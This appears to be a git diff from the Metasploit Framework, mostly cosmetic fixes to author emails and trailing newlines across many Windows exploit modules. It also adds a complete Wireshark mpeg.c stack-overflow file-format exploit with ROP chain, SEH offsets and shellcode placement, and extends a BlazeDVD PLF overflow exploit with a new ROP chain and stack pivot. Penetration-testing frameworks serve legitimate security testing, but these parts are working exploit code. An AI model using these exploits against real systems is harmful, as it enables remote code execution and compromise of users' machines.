@@ -308,4 +308,4 @@ $ ruby pattern_offset.rb 41306941  6888
 $ ruby pattern_offset.rb 336b4632  6888
 [*] Exact match at offset 4208
 
-=end
\ No newline at end of file
+=end
diff --git a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
index 5670eedd15..8c326407bb 100644
--- a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
+++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
@@ -286,4 +286,4 @@ class Metasploit3 < Msf::Exploit::Remote
     send_response(cli, html, {'Content-Type'=>'text/html'})
   end
 
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/windows/browser/mcafee_mvt_exec.rb b/modules/exploits/windows/browser/mcafee_mvt_exec.rb
index 0c34987d18..b79c83586b 100644
--- a/modules/exploits/windows/browser/mcafee_mvt_exec.rb
+++ b/modules/exploits/windows/browser/mcafee_mvt_exec.rb
@@ -117,4 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote
 
   end
 
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb
index 396f5ba801..a5847c055a 100644
--- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb
+++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb
@@ -25,10 +25,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Faithless <rhyskidd [at] gmail.com>',
+          'Faithless <rhyskidd[at]gmail.com>',
           'Darkeagle <unl0ck.net>',
           'hdm',
-          '<justfriends4n0w [at] yahoo.com>',
+          '<justfriends4n0w[at]yahoo.com>',
           'Unknown',
         ],
       'References'     =>
diff --git a/modules/exploits/windows/browser/ms06_055_vml_method.rb b/modules/exploits/windows/browser/ms06_055_vml_method.rb
index eb421d6fd3..0342c3f2ea 100644
--- a/modules/exploits/windows/browser/ms06_055_vml_method.rb
+++ b/modules/exploits/windows/browser/ms06_055_vml_method.rb
@@ -22,17 +22,17 @@ class Metasploit3 < Msf::Exploit::Remote
       'Author'         =>
         [
           'hdm',
-          'Aviv Raff <avivra [at] gmail.com>',
-          'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>',
-          'Mr.Niega <Mr.Niega [at] gmail.com>',
-          'M. Shirk <shirkdog_list [at] hotmail.com>'
+          'Aviv Raff <avivra[at]gmail.com>',
+          'Trirat Puttaraksa (Kira) <trir00t[at]gmail.com>',
+          'Mr.Niega <Mr.Niega[at]gmail.com>',
+          'M. Shirk <shirkdog_list[at]hotmail.com>'
         ],
       'References'     =>
         [
-          ['CVE',   '2006-4868' ],
-          ['OSVDB', '28946' ],
-          ['MSB',   'MS06-055' ],
-          ['BID',   '20096' ],
+          ['CVE',   '2006-4868'],
+          ['OSVDB', '28946'],
+          ['MSB',   'MS06-055'],
+          ['BID',   '20096'],
         ],
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
index e4b2c478cb..6d553bb2dd 100644
--- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
+++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Scott Bell <scott.bell@security-assessment.com>' # Vulnerability discovery & Metasploit module
+          'Scott Bell <scott.bell[at]security-assessment.com>' # Vulnerability discovery & Metasploit module
         ],
       'References'     =>
         [
diff --git a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
index 2de5599e9d..20d94cfb79 100644
--- a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
+++ b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
@@ -379,4 +379,4 @@ cccccccc ??              ???
 001f58d4  48 00 9c 02 84 14 5c 75-e8 ac 9c 02 1b 00 00 00  H.....\u........
 001f58e4  e8 52 19 00 ed 7e a1 ea-00 01 08 ff 08 00 00 00  .R...~..........
 001f58f4  90 01 00 00 f0 00 00 00-00 00 00 00 01 00 00 00  ................
-=end
\ No newline at end of file
+=end
diff --git a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
index 86be4d034d..adcefa77fe 100644
--- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
+++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
           :ua_name     => Msf::HttpClients::IE,
           :ua_ver      => '10.0',
           :mshtml_build => lambda { |ver| ver.to_i < 16843 },
-          :flash       => /^12\./
+          :flash       => /^1[23]\./
         },
       'DefaultOptions' =>
         {
diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
index f5efd9b11a..e5ce111351 100644
--- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
+++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
@@ -314,4 +314,4 @@ target.SetEngine(0x7ffe0300-0x45c); // Disclosing ntdll
 var leak = target.GetMiscAccess();
 alert(leak);
 
-=end
\ No newline at end of file
+=end
diff --git a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
index b7d998d5e8..ffd3bc01a2 100644
--- a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
+++ b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
@@ -200,4 +200,4 @@ And user to get RCE here:
 .text:10004473                 jz      short loc_10004477
 .text:10004475                 call    eax             ; RCE!
 
-=end
\ No newline at end of file
+=end
diff --git a/modules/exploits/windows/browser/ovftool_format_string.rb b/modules/exploits/windows/browser/ovftool_format_string.rb
index 64e2f6b299..a44673dc43 100644
--- a/modules/exploits/windows/browser/ovftool_format_string.rb
+++ b/modules/exploits/windows/browser/ovftool_format_string.rb
@@ -129,4 +129,4 @@ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
     send_response(cli, ovf, {'Content-Type'=>'text/xml'})
   end
 
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/windows/browser/quickr_qp2_bof.rb b/modules/exploits/windows/browser/quickr_qp2_bof.rb
index 8e173c5c33..965899b201 100644
--- a/modules/exploits/windows/browser/quickr_qp2_bof.rb
+++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb
@@ -263,4 +263,4 @@ class Metasploit3 < Msf::Exploit::Remote
     send_response(cli, html, {'Content-Type'=>'text/html'})
   end
 
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
index a749d68d7e..1dc20aa6c3 100644
--- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
+++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
@@ -269,4 +269,4 @@ eip=28d2954d esp=0013e230 ebp=0013e2d4 iopl=0         nv up ei pl nz ac pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
 tsgetx71ex553!Ordinal931+0x2dd:
 28d2954d ff5104          call    dword ptr [ecx+4]    ds:0023:342d1ea4=????????
-=end
\ No newline at end of file
+=end
diff --git a/modules/exploits/windows/browser/verypdf_pdfview.rb b/modules/exploits/windows/browser/verypdf_pdfview.rb
index a7c78eefad..c30f034d48 100644
--- a/modules/exploits/windows/browser/verypdf_pdfview.rb
+++ b/modules/exploits/windows/browser/verypdf_pdfview.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
         to execute arbitrary code within the context of the affected application.
       },
       'License'        => MSF_LICENSE,
-      'Author'         => [ 'MC', 'dean <dean [at] zerodaysolutions [dot] com>' ],
+      'Author'         => [ 'MC', 'dean <dean[at]zerodaysolutions.com>' ],
       'References'     =>
         [
           [ 'CVE', '2008-5492'],
diff --git a/modules/exploits/windows/emc/replication_manager_exec.rb b/modules/exploits/windows/emc/replication_manager_exec.rb
index 0a9e6b7710..30bc0e2ef6 100644
--- a/modules/exploits/windows/emc/replication_manager_exec.rb
+++ b/modules/exploits/windows/emc/replication_manager_exec.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = GreatRanking
 
   include Msf::Exploit::Remote::Tcp
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -50,6 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
           # Tested on Windows XP and Windows 2003
           [ 'EMC Replication Manager 5.2.1 / Windows Native Payload', { } ]
         ],
+      'CmdStagerFlavor' => 'vbs',
       'DefaultOptions' =>
         {
           'WfsDelay' => 5
diff --git a/modules/exploits/windows/fileformat/actfax_import_users_bof.rb b/modules/exploits/windows/fileformat/actfax_import_users_bof.rb
index 4129e6df9d..7185e92171 100644
--- a/modules/exploits/windows/fileformat/actfax_import_users_bof.rb
+++ b/modules/exploits/windows/fileformat/actfax_import_users_bof.rb
@@ -105,4 +105,4 @@ class Metasploit3 < Msf::Exploit::Remote
     file_create(file)
 
   end
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/windows/fileformat/blazedvd_plf.rb b/modules/exploits/windows/fileformat/blazedvd_plf.rb
index 88a82bd8bc..b97afc1567 100644
--- a/modules/exploits/windows/fileformat/blazedvd_plf.rb
+++ b/modules/exploits/windows/fileformat/blazedvd_plf.rb
@@ -12,36 +12,58 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'BlazeDVD 5.1 PLF Buffer Overflow',
+      'Name'           => 'BlazeDVD 6.1 PLF Buffer Overflow',
       'Description'    => %q{
-          This module exploits a stack over flow in BlazeDVD 5.1. When
+          This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When
           the application is used to open a specially crafted plf file,
           a buffer is overwritten allowing for the execution of arbitrary code.
       },
       'License'        => MSF_LICENSE,
-      'Author'         => [ 'MC' ],
+      'Author'         =>
+         [
+           'MC', # Developed target 5.1
+           'Deepak Rathore', # ExploitDB PoC
+           'Spencer McIntyre', # Developed taget 6.2
+           'Ken Smith' # Developed target 6.2
+         ],
       'References'     =>
         [
           [ 'CVE' , '2006-6199' ],
-          [ 'OSVDB', '30770'],
+          [ 'EDB', '32737' ],
+          [ 'OSVDB', '30770' ],
           [ 'BID', '35918' ],
         ],
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'process',
-          'DisablePayloadHandler' => 'true',
+          'EXITFUNC' => 'process'
         },
       'Payload'        =>
         {
           'Space'    => 750,
-          'BadChars' => "\x00",
-          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
-          'DisableNops'  =>  'True',
+          'BadChars' => "\x00\x0a\x1a",
+          'DisableNops'  =>  true
         },
       'Platform' => 'win',
       'Targets'        =>
         [
-          [ 'BlazeDVD 5.1', { 'Ret' => 0x100101e7 } ],
+          [ 'BlazeDVD 6.2',
+            {
+              'Payload' =>
+                {
+                  # Stackpivot => add esp,0xfffff254
+                  'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
+                }
+            }
+          ],
+          [ 'BlazeDVD 5.1',
+            {
+              'Ret' => 0x100101e7,
+              'Payload' =>
+                {
+                  'EncoderType' => Msf::Encoder::Type::AlphanumUpper
+                }
+            }
+          ],
         ],
       'Privileged'     => false,
       'DisclosureDate' => 'Aug 03 2009',
@@ -49,22 +71,59 @@ class Metasploit3 < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('FILENAME',   [ false, 'The file name.',  'msf.plf']),
+        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
       ], self.class)
   end
 
+  def rop_chain
+    # rop chain generated with mona.py - www.corelan.be
+    case target.name
+    when 'BlazeDVD 6.2'
+      rop_gadgets = [ ]
+      # 0x6162e802 RETN (ROP NOP) [EPG.dll]
+      rop_gadgets.fill(0x6162e802, 0..7)
+      rop_gadgets += [
+        0x61636758, # POP EAX # RETN [EPG.dll]
+        0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]
+        0x616306ed, # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]
+        0x616385d8, # XCHG EAX,ESI # RETN 0x00 [EPG.dll]
+        0x61628ea2, # POP EBP # RETN [EPG.dll]
+        0x616069a1, # push esp # ret 0x04 [EPG.dll]
+        0x61626702, # POP EAX # RETN [EPG.dll]
+        0xfffffdff, # Value to negate, will become 0x00000201
+        0x61627d9c, # NEG EAX # RETN [EPG.dll]
+        0x61640124, # XCHG EAX,EBX # RETN [EPG.dll]
+        0x61629938, # POP EAX # RETN [EPG.dll]
+        0xffffffc0, # Value to negate, will become 0x00000040
+        0x61627d9c, # NEG EAX # RETN [EPG.dll]
+        0x61608ba2, # XCHG EAX,EDX # RETN [EPG.dll]
+        0x61612f5a, # POP ECX # RETN [EPG.dll]
+        0x100142ab, # &Writable location [SkinScrollBar.Dll]
+        0x616313ac, # POP EDI # RETN [EPG.dll]
+        0x6162e588, # RETN (ROP NOP) [EPG.dll]
+        0x6162d638, # POP EAX # RETN [EPG.dll]
+        0x90909090, # nop
+        0x61620831, # PUSHAD # RETN [EPG.dll]
+      ]
+    end
+    return rop_gadgets.flatten.pack("V*")
+  end
+
   def exploit
-
-    plf = rand_text_alpha_upper(6024)
-
-    plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2)  + [target.ret].pack('V')
-    plf[876,12] = make_nops(12)
-    plf[888,payload.encoded.length] = payload.encoded
+    case target.name
+    when 'BlazeDVD 5.1'
+      plf = rand_text_alpha_upper(6024)
+      plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2)  + [target.ret].pack('V')
+      plf[876,12] = make_nops(12)
+      plf[888,payload.encoded.length] = payload.encoded
+    when 'BlazeDVD 6.2'
+      plf = rand_text_alphanumeric(260)
+      plf << rop_chain
+      plf << payload.encoded
+    end
 
     print_status("Creating '#{datastore['FILENAME']}' file ...")
-
     file_create(plf)
-
   end
 
 end
diff --git a/modules/exploits/windows/fileformat/djvu_imageurl.rb b/modules/exploits/windows/fileformat/djvu_imageurl.rb
index 937e3d6ec7..a9c4d93294 100644
--- a/modules/exploits/windows/fileformat/djvu_imageurl.rb
+++ b/modules/exploits/windows/fileformat/djvu_imageurl.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
         for scripting, so choose your attack vector accordingly.
       },
       'License'        => MSF_LICENSE,
-      'Author'         => [ 'dean <dean [at] zerodaysolutions [dot] com>' ],
+      'Author'         => [ 'dean <dean[at]zerodaysolutions.com>' ],
       'References'     =>
         [
           [ 'CVE', '2008-4922' ],
diff --git a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb
index 2eb3c6cb10..5ba0fcb587 100644
--- a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb
+++ b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
         This control is not marked safe for scripting, please choose your attack vector carefully.
       },
       'License'        => MSF_LICENSE,
-      'Author'         => [ 'dean <dean [at] zerodaysolutions [dot] com>' ],
+      'Author'         => [ 'dean <dean[at]zerodaysolutions.com>' ],
       'References'     =>
         [
           [ 'CVE','2008-1898' ],
diff --git a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb
index c9193884fa..5e8b2fea2c 100644
--- a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb
+++ b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb
@@ -82,4 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote
     file_create(filecontent)
 
   end
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/windows/fileformat/sascam_get.rb b/modules/exploits/windows/fileformat/sascam_get.rb
index 546f85d455..53294f894c 100644
--- a/modules/exploits/windows/fileformat/sascam_get.rb
+++ b/modules/exploits/windows/fileformat/sascam_get.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
         attack vector carefully.
         },
       'License'        => MSF_LICENSE,
-      'Author'         => [ 'dean <dean [at] zerodaysolutions [dot] com>' ],
+      'Author'         => [ 'dean <dean[at]zerodaysolutions.com>' ],
       'References'     =>
         [
           [ 'CVE', '2008-6898' ],
diff --git a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
new file mode 100644
index 0000000000..0a44041cad
--- /dev/null
+++ b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
@@ -0,0 +1,138 @@
+#
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wireshark wiretap/mpeg.c Stack Buffer Overflow',
+      'Description'    => %q{
+          This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
+          by generating an malicious file.)
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Wesley Neelen', # Discovery vulnerability
+          'j0sm1',  # Exploit and msf module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2014-2299'],
+          [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ],
+          [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ],
+          [ 'BID', '66066']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process',
+        },
+      'Payload'        =>
+        {
+          'BadChars'    => "\xff",
+          'Space'       => 600,
+          'DisableNops' => 'True',
+          'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'WinXP SP3 Spanish (bypass DEP)',
+            {
+              'OffSet' => 69732,
+              'OffSet2' => 70476,
+              'Ret'    => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16)
+              'jmpesp' => 0x68e2bfb9,
+            }
+          ],
+        [ 'WinXP SP2/SP3 English  (bypass DEP)',
+            {
+              'OffSet2' => 70692,
+              'OffSet' => 70476,
+              'Ret'    => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module
+              'jmpesp' => 0x68e2bfb9,
+            }
+          ],
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Mar 20 2014'
+    ))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ true, 'pcap file',  'mpeg_overflow.pcap']),
+      ], self.class)
+  end
+
+  def create_rop_chain()
+
+    # rop chain generated with mona.py - www.corelan.be
+    rop_gadgets =
+    [
+      0x61863c2a,  # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
+      0x62d9027c,  # ptr to &VirtualProtect() [IAT libcares-2.dll]
+      0x61970969,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
+      0x61988cf6,  # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
+      0x619c0a2a,  # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
+      0x61841e98,  # & push esp # ret  [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
+      0x6191d11a,  # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
+      0x00000201,  # 0x00000201-> ebx
+      0x5a4c1414,  # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0]
+      0x00000040,  # 0x00000040-> edx
+      0x6197660f,  # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
+      0x668242b9,  # &Writable location [libgnutls-26.dll]
+      0x6199b8a5,  # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0
+      0x63a528c2,  # RETN (ROP NOP) [libgobject-2.0-0.dll]
+      0x61863c2a,  # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
+      0x90909090,  # nop
+      0x6199652d,  # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
+    ].flatten.pack("V*")
+
+    return rop_gadgets
+
+  end
+
+  def exploit
+
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+    ropchain = create_rop_chain
+    magic_header = "\xff\xfb\x41"                # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure
+    # Here we build the packet data
+    packet = rand_text_alpha(883)
+    packet << "\x6c\x7d\x37\x6c" # NOP RETN
+    packet << "\x6c\x7d\x37\x6c" # NOP RETN
+    packet << ropchain
+    packet << payload.encoded                    # Shellcode
+    packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)
+
+    # 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000
+    # After nseh and seh we haven't space, then we have to jump to another location.
+
+    # When file is open with command line. This is NSEH/SEH overwrite
+    packet << make_nops(4) # nseh
+    packet << "\x6c\x2e\xe0\x68" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN
+
+    packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk
+
+    # When file is open with GUI interface. This is NSEH/SEH overwrite
+    packet << make_nops(4) # nseh
+    # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [libjpeg-8.dll] **
+    packet << "\x55\x59\x80\x6b"
+
+    print_status("Preparing payload")
+    filecontent = magic_header
+    filecontent << packet
+    print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes")
+    file_create(filecontent)
+
+  end
+end
diff --git a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb
index b3f0ae9027..4fe3d16a05 100644
--- a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb
+++ b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'hack4love <hack4love [at] hotmail.com>',
+          'hack4love <hack4love[at]hotmail.com>',
           'germaya_x',
           'loneferret',
           'jduck'
diff --git a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb
index b22842f4b7..809287d2f7 100644
--- a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb
+++ b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'	=> MSF_LICENSE,
       'Author'	=>
         [
-          'hadji samir <s-dz [at] hotmail.fr>',    # Discovered the bug
+          'hadji samir <s-dz[at]hotmail.fr>',    # Discovered the bug
           'corelanc0d3r <peter.ve[at]corelan.be>', # First working exploit
           'digital1',         # First working exploit
           'jduck',            # Alpha+Unicode encoding :-/
diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb
index 0dc06797de..c52735c975 100644
--- a/modules/exploits/windows/firewall/blackice_pam_icq.rb
+++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'Payload'        =>
         {
-          'Space'           => 504 -31 -4,
+          'Space'           => 504-31-4,
           'BadChars'        => "\x00",
           'MinNops'         => 0,
           'MaxNops'         => 0,
diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb
index 1ac9951969..d855b94040 100644
--- a/modules/exploits/windows/ftp/easyftp_list_fixret.rb
+++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'Karn Ganeshan <karnganeshan [at] gmail.com>', # original version
+          'Karn Ganeshan <karnganeshan[at]gmail.com>', # original version
           'MFR',    # convert to metasploit format.
           'jduck'   # modified to use fix-up stub (works with bigger payloads)
         ],
diff --git a/modules/exploits/windows/ftp/globalscapeftp_input.rb b/modules/exploits/windows/ftp/globalscapeftp_input.rb
index 091b153aec..9a5715a7a9 100644
--- a/modules/exploits/windows/ftp/globalscapeftp_input.rb
+++ b/modules/exploits/windows/ftp/globalscapeftp_input.rb
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
         All versions prior to 3.0.3 are affected by this flaw. A valid user account (
         or anonymous access) is required for this exploit to work.
       },
-      'Author'         => [ 'Fairuzan Roslan <riaf [at] mysec.org>', 'Mati Aharoni <mati [at] see-security.com>' ],
+      'Author'         => [ 'Fairuzan Roslan <riaf[at]mysec.org>', 'Mati Aharoni <mati[at]see-security.com>' ],
       'License'        => BSD_LICENSE,
       'References'     =>
         [
diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb
index 72575fe9ae..87acfe67e3 100644
--- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb
+++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
           This module exploits the FTP server component of the Sasser worm.
         By sending an overly long PORT command the stack can be overwritten.
       },
-      'Author'	=> [ '<valsmith [at] metasploit.com>', '<chamuco [at] gmail.com>', 'patrick' ],
+      'Author'	=> [ '<valsmith[at]metasploit.com>', '<chamuco[at]gmail.com>', 'patrick' ],
       'Arch'		=> [ ARCH_X86 ],
       'License'	=> MSF_LICENSE,
       'References'	=>
diff --git a/modules/exploits/windows/ftp/slimftpd_list_concat.rb b/modules/exploits/windows/ftp/slimftpd_list_concat.rb
index c6e8f4e25e..632de06677 100644
--- a/modules/exploits/windows/ftp/slimftpd_list_concat.rb
+++ b/modules/exploits/windows/ftp/slimftpd_list_concat.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
         affects all versions of SlimFTPd prior to 3.16 and was
         discovered by Raphael Rigo.
       },
-      'Author'         => [ 'Fairuzan Roslan <riaf [at] mysec.org>' ],
+      'Author'         => [ 'Fairuzan Roslan <riaf[at]mysec.org>' ],
       'License'        => BSD_LICENSE,
       'References'     =>
         [
diff --git a/modules/exploits/windows/ftp/warftpd_165_user.rb b/modules/exploits/windows/ftp/warftpd_165_user.rb
index e92334724f..4802235636 100644
--- a/modules/exploits/windows/ftp/warftpd_165_user.rb
+++ b/modules/exploits/windows/ftp/warftpd_165_user.rb
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
           This module exploits a buffer overflow found in the USER command
         of War-FTPD 1.65.
       },
-      'Author'         => 'Fairuzan Roslan <riaf [at] mysec.org>',
+      'Author'         => 'Fairuzan Roslan <riaf[at]mysec.org>',
       'License'        => BSD_LICENSE,
       'References'     =>
         [
diff --git a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb
index 9953aa07b0..70988f9cd5 100644
--- a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb
+++ b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb
@@ -64,15 +64,17 @@ class Metasploit3 < Msf::Exploit::Remote
 
     res = send_request_cgi(
       {
-        'uri'		=> '/robohelp/server?PUBLISH=' + uid,
+        'uri'		=> '/robohelp/server',
         'version'	=> '1.1',
         'method'	=> 'POST',
         'data'		=> file,
-        'headers'	=>
-          {
-            'Content-Type'		=> 'multipart/form-data; boundary=---------------------------' + uid,
-            'UID'			=> uid,
-          }
+        'headers'	=> {
+          'Content-Type'		=> 'multipart/form-data; boundary=---------------------------' + uid,
+          'UID'			=> uid,
+        },
+        'vars_get' => {
+          'PUBLISH' => uid
+        }
       }, 5)
 
     if ( res and res.message =~ /OK/ )
@@ -80,9 +82,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
       print_status("Got sessionid of '#{id}'. Sending our second request to '#{page}'...")
       data = send_request_raw({
-          'uri'		=> '/robohelp/robo/reserved/web/' + id + '/' + page ,
+          'uri'		=> normalize_uri('robohelp', 'robo','reserved', 'web', id, page),
           'method'	=> 'GET',
-          'version'	=> '1.0',
+          'version'	=> '1.0'
       }, 5)
 
       handler
diff --git a/modules/exploits/windows/http/badblue_ext_overflow.rb b/modules/exploits/windows/http/badblue_ext_overflow.rb
index bbf9ac4435..de19a97d25 100644
--- a/modules/exploits/windows/http/badblue_ext_overflow.rb
+++ b/modules/exploits/windows/http/badblue_ext_overflow.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'    => %q{
         This is a stack buffer overflow exploit for BadBlue version 2.5.
       },
-      'Author'         => 'acaro <acaro [at] jervus.it>',
+      'Author'         => 'acaro <acaro[at]jervus.it>',
       'License'        => BSD_LICENSE,
       'References'     =>
         [
